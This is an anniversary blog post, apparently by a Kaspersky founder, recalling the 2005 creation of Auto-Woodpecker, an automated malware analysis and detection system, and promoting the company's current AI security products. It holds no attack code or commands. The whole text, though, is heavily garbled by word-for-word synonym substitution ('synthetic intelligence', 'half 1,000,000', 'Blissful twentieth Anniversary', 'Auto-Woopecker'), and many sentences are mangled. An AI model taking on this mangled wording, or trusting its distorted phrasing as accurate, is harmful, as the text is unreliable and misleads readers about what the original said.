We reside within the age of AI hype. Synthetic intelligence is right here, there, and in all places – so promising, barely mysterious, however undeniably guiding humanity towards a brighter way forward for technological singularity that’s nonetheless considerably incomprehensible and probably a black gap.
Some readers may detect sarcasm on this assertion – however that will be a mistake. Machine learning-driven automation (ML), neural networks, and different AI applied sciences have already taken over many industries. And there’s extra to return within the evolution of Homo sapiens. When you’re all in favour of diving deeper into this matter, try the historical past of the assorted industrial revolutions: first, second, third, and even fourth.
According to this pattern, cybersecurity was maybe one of many pioneers in adopting new, good applied sciences. And what makes me significantly pleased with this course of is that our firm was one of many first within the business to efficiently implement this shiny AI-driven future. How else might we probably deal with practically half 1,000,000 new malicious applications rising each single day as of early 2025? No instructional system on the earth can produce sufficient consultants to maintain up with that. The one resolution is to create clever methods able to independently and extremely precisely neutralizing cyberattacks. Consultants are then left with solely essentially the most complicated circumstances – and, in fact, the difficult activity of inventing and repeatedly bettering these methods.
Just a few days in the past, we celebrated an thrilling anniversary. Twenty years in the past was born the prototype of our first AI/ML know-how for automated malware evaluation and the creation of “detections” – antivirus updates that defend computer systems, devices, and different gadgets from new assaults.
The know-how was given a reputation that’s fairly odd at first look – Avtodyatel, which interprets as Auto-Woodpecker! However there’s a easy clarification for it: inside our crew, safety analysts have been affectionately known as woodpeckers – tirelessly pecking away at viruses and processing streams of suspicious information. After which we added the “Auto” to “Woodpecker” for the title of the tech designed to do that job routinely (by the way, I used to be a woodpecker myself again then).
After digging by way of our archives, we discovered not solely the birthdate of this primary automation child, but additionally some fascinating images of the unique plans for its creation. We even recalled its birthplace – the 14th ground of the Radiophysics constructing close to the Planernaya metro station in northwest Moscow the place we rented workplace house on the time. So get cozy, and I’ll inform you an interesting story. It began kinda like this…
1 / 4 of a century in the past, malicious applications have been a lot rarer – and, paradoxically, far more superior – than at this time’s typical malware, regardless of being written by pioneering fans, ingenious lone programmers, and cyber pranksters. This made researching them an actual pleasure – every new virus taught you one thing new. Again then, like my fellow woodpeckers, I manually analyzed the stream of malicious applications – what would now be known as “malware analysis”.
By that point, it was already tough to compile all present malware right into a single reference guide as had been performed again in 1992. However we nonetheless managed the circulation, and on the finish of every work week, I manually compiled antivirus database updates.
Nevertheless, over time, malware creation advanced from mere mischief and boundary-pushing right into a full-fledged prison business. Cybercriminals now not simply needed to contaminate as many computer systems as attainable – they sought to revenue from it. For instance, they harvested e-mail addresses from contaminated machines and bought them for spam distribution.
Sensing revenue, these unhealthy actors triggered exponential progress in malware manufacturing. However as an alternative of inventing essentially new threats, they began mass-producing barely modified variations of present ones. And I noticed we couldn’t sustain manually; if we have been to proceed down this path, we’d drown in an countless flood of cyber-garbage.
Luckily, technological developments on the time required a lot smaller funding and fewer growth time. You may simply purchase some pizza (pineapple-topped, in fact!), collect just a few sensible minds in a gathering room, and spend a few hours brainstorming challenge concepts. And so, on February 22, 2005, I assembled my colleagues to develop plans for automating our malware analyst work.
Simply check out this magnificence!
We had some primitive automation instruments earlier than, in fact. However Auto-Woodpecker was the primary system with a essentially new degree:
- It freed up helpful consultants from repetitive duties, permitting them to give attention to extra superior challenges.
- It massively scaled up operational effectivity.
- It helped spotlight comparable (or associated) incidents for additional evaluation.
In easy phrases, the system routinely acquired new information from brokers (“crawlers”) that scanned web sites, e-mail traps, and community sensors. These information have been then routinely unpacked and executed in a safe atmosphere – a man-made setting designed to look at malware behaviour.
There, the samples have been analyzed by automated scanners, categorized, after which compiled into antivirus databases.
The important thing problem when encountering a brand new malware pattern was figuring out whether or not it was a never-before-seen risk, or just a variation of a recognized one. That is the place the file auto-classifier (marked as “FF” within the diagram above) got here into play, using AI/ML ideas – now a necessary characteristic in practically each cybersecurity product (aside from fraudulent ones).
It didn’t work completely at first, however it rapidly improved. We systematically documented all our concepts, detailed how subsystems would work together, how information can be exchanged, and the way false positives can be dealt with. Then we rolled up our sleeves and set to work.
Just a few months later, the primary model of Auto-Woopecker went reside.
The outcomes have been on the spot and dramatic. Beforehand, 5 of us manually analyzed round 300 malware samples per week – a powerful quantity on the time. However with Auto-Woodpecker our productiveness skyrocketed. And because the know-how improved, this skyrocketing simply stored on… skyrocketing!
Earlier than lengthy, Auto-Woodpecker was processing your complete incoming stream – leaving solely 2-5% of all suspicious information for handbook knowledgeable overview. At the moment, in fact, our instruments are much more superior, and AI-driven applied sciences play an excellent larger position in cybersecurity.
To provide you a glimpse of how far we’ve come, listed below are only a few current examples:
- Kaspersky MLAD (Machine Studying for Anomaly Detection): A predictive analytics system that detects early indicators of apparatus failure, course of disruptions, cyberattacks, and human errors in industrial telemetry alerts – lengthy earlier than they trigger actual harm.
- Kaspersky MDR (Managed Detection and Response) This service has been utilizing an AI analyst for a number of years to filter out false positives, lowering the workload on SOC specialists and permitting them to give attention to complicated risk investigations.
- Kaspersky Menace Lookup: Simply final week we built-in a software for locating contextual info on indicators of compromise utilizing an AI-powered giant language mannequin.
The outcomes converse for themselves, and we’ve even larger plans forward!…
Blissful twentieth Anniversary, Auto-Woodpecker!!
Cin cin!
